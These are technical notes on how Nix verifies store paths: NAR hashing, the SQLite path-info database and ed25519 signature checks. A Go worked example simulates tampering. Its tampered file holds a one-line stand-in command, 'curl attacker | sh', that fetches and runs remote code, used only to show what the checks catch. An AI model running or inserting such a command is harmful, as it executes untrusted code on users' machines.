Verification
1. Nix store path verification
1.1. Commands
- nix-store --verify
- nix-store --verify-path ...
- nix store verify
- nix verify
1.2. Code
- nix verify is a shorthand for nix store verify
- nix store verify
- nix-store --verify/--verify-path
1.3. Algorithm
All three are implemented separately but do essentially the same thing:
- get the path's info (ValidPathInfo) with store->queryPathInfo
- serialize the path as a NAR with store->narFromPath and hash it (for nix-store --verify this step only runs with --check-contents; --verify-path always does it)
- compare the computed NAR hash with the one recorded in the path info
- (nix3) verify sigs
Store::queryPathInfo in store-api.cc looks opaque because it is a caching layer (an in-memory path-info cache, then the on-disk NAR-info cache for remote stores) around the virtual queryPathInfoUncached; for the local store that boils down to reading the path's row from the SQLite db. narFromPath is virtual as well, and for the local store the implementation that runs is LocalFSStore::narFromPath in local-fs-store.cc.
1.4. PathInfo db
Path info lives in two places. The local store keeps it in the SQLite db under /nix/var/nix/db (ValidPaths table, local-store.cc). nar-info-disk-cache.cc is a different thing: an on-disk cache of .narinfo lookups against binary caches, so repeated queries do not hit the network. Both get populated and read through queryPathInfo. A record contains, most notably, the NAR hash and size, the references, the sigs, and for binary-cache entries also the hash of the compressed file.
1.5. narFromPath
local-fs-store.cc implements it by serializing the actual on-disk store path, and LocalStore inherits that. Binary-cache stores instead fetch the NAR from the cache. Either way the hash under test is recomputed from the content, while the expected hash comes from the db, which is independent of the store contents. That independence is what makes the check meaningful against a modified store path, and it is also its limit: whoever can rewrite both the file and its db row (root on the host) passes the content check, and only signature verification can catch that.
1.6. nix3
nix store verify is the most thorough of the three. On top of nix-store's content check it verifies signatures: first the ones stored in the local path info, then, if substituters are configured, the ones the substituters publish for the same path (accepted only if they agree on the NAR hash). A signature is an ed25519 signature over the path's fingerprint, i.e. "1;<path>;<narHash>;<narSize>;<refs>", checked against the keys in trusted-public-keys; at least sigs-needed of them (default 1) must verify. --no-contents and --no-trust skip the content and signature steps respectively. The fingerprint is built from the local path info, so a valid signature proves that a trusted key signed this path's recorded metadata; only together with the content check does it say anything about the bytes on disk. Paths built locally are unsigned unless secret-key-files is set, so they fail the signature step unless --no-trust is given.
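The pieces described in 1.3 through 1.6, as one added worked example in Go (this is not Nix's own code): a NAR serializer for a single regular file standing in for narFromPath, Nix's base-32 hash printing, the fingerprint that signatures cover, the hash comparison against the recorded path info, and the signature check against a set of trusted keys. The store path, key name and file contents are constructed for the example, and counting one valid signature per trusted key name is this example's simplification.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"fmt"
	"sort"
	"strings"
)

const nix32Chars = "0123456789abcdfghijklmnpqrsvwxyz" // Nix's base-32 alphabet (no e, o, t, u)

// Nix32 prints a hash as Nix does (hash.cc printHash32): 5-bit groups, most significant
// group first, bits taken little-endian from the byte array.
func Nix32(h []byte) string {
	var sb strings.Builder
	for k := (len(h)*8 - 1) / 5; k >= 0; k-- {
		i, j := (k*5)/8, uint((k*5)%8)
		c := uint(h[i]) >> j
		if i < len(h)-1 {
			c |= uint(h[i+1]) << (8 - j)
		}
		sb.WriteByte(nix32Chars[c&0x1f])
	}
	return sb.String()
}

// narString appends one NAR string: u64 little-endian length, the bytes, zero padding to 8.
func narString(w *bytes.Buffer, s []byte) {
	binary.Write(w, binary.LittleEndian, uint64(len(s)))
	w.Write(s)
	w.Write(make([]byte, (8-len(s)%8)%8))
}

// NarRegularFile serializes one non-executable regular file as a NAR (what narFromPath yields for it).
func NarRegularFile(contents []byte) []byte {
	var buf bytes.Buffer
	for _, s := range []string{"nix-archive-1", "(", "type", "regular", "contents"} {
		narString(&buf, []byte(s))
	}
	narString(&buf, contents)
	narString(&buf, []byte(")"))
	return buf.Bytes()
}

// PathInfo is the part of a ValidPathInfo db row that verification reads.
type PathInfo struct {
	Path    string
	NarHash [sha256.Size]byte
	NarSize uint64
	Refs    []string
	Sigs    []string // "keyname:base64(ed25519 signature over Fingerprint())"
}

// Fingerprint is the signed string, as in ValidPathInfo::fingerprint():
// "1;<path>;sha256:<nix32 narHash>;<narSize>;<sorted refs joined by ','>".
func (p PathInfo) Fingerprint() string {
	refs := append([]string(nil), p.Refs...)
	sort.Strings(refs)
	return fmt.Sprintf("1;%s;sha256:%s;%d;%s", p.Path, Nix32(p.NarHash[:]), p.NarSize, strings.Join(refs, ","))
}

// CheckContents re-hashes the NAR of the on-disk bytes and compares with the db hash (--check-contents).
func CheckContents(p PathInfo, onDisk []byte) bool {
	return sha256.Sum256(NarRegularFile(onDisk)) == p.NarHash
}

// Sign produces a Nix-style "keyname:base64sig" over a fingerprint.
func Sign(keyName string, priv ed25519.PrivateKey, fingerprint string) string {
	return keyName + ":" + base64.StdEncoding.EncodeToString(ed25519.Sign(priv, []byte(fingerprint)))
}

// CheckSignatures is the nix3 step: signatures from unknown key names are skipped, the rest are
// verified over the fingerprint. Returns how many trusted keys signed (one per key name, this
// example's choice); the caller compares that with sigs-needed.
func CheckSignatures(p PathInfo, trusted map[string]ed25519.PublicKey) int {
	fp, good := []byte(p.Fingerprint()), map[string]bool{}
	for _, s := range p.Sigs {
		name, b64, ok := strings.Cut(s, ":")
		if pub, known := trusted[name]; ok && known {
			raw, err := base64.StdEncoding.DecodeString(b64)
			if err == nil && len(raw) == ed25519.SignatureSize && ed25519.Verify(pub, fp, raw) {
				good[name] = true
			}
		}
	}
	return len(good)
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	trusted := map[string]ed25519.PublicKey{"example-key-1": pub} // constructed key name
	good, evil := []byte("#!/bin/sh\necho hello\n"), []byte("#!/bin/sh\ncurl attacker | sh\n") // constructed contents
	nar := NarRegularFile(good)
	info := PathInfo{Path: "/nix/store/" + strings.Repeat("0", 32) + "-hello", NarHash: sha256.Sum256(nar), NarSize: uint64(len(nar))}
	info.Sigs = []string{Sign("example-key-1", priv, info.Fingerprint())}
	fmt.Println("intact: contents", CheckContents(info, good), "sigs", CheckSignatures(info, trusted) >= 1)
	fmt.Println("file tampered, db intact: contents", CheckContents(info, evil)) // the hash check catches this
	// File tampered and the db hash rewritten to match: only the signature check fails,
	// because the new fingerprint was never signed by a trusted key.
	forged := info
	forged.NarHash, forged.NarSize = sha256.Sum256(NarRegularFile(evil)), uint64(len(NarRegularFile(evil)))
	fmt.Println("file and db tampered: contents", CheckContents(forged, evil), "sigs", CheckSignatures(forged, trusted) >= 1)
}
```

Running it prints three cases: the intact path passes both checks, a modified file with an untouched db row fails the content check, and a modified file whose db row was rewritten to match passes the content check and fails only the signature check, which is why nix store verify does both.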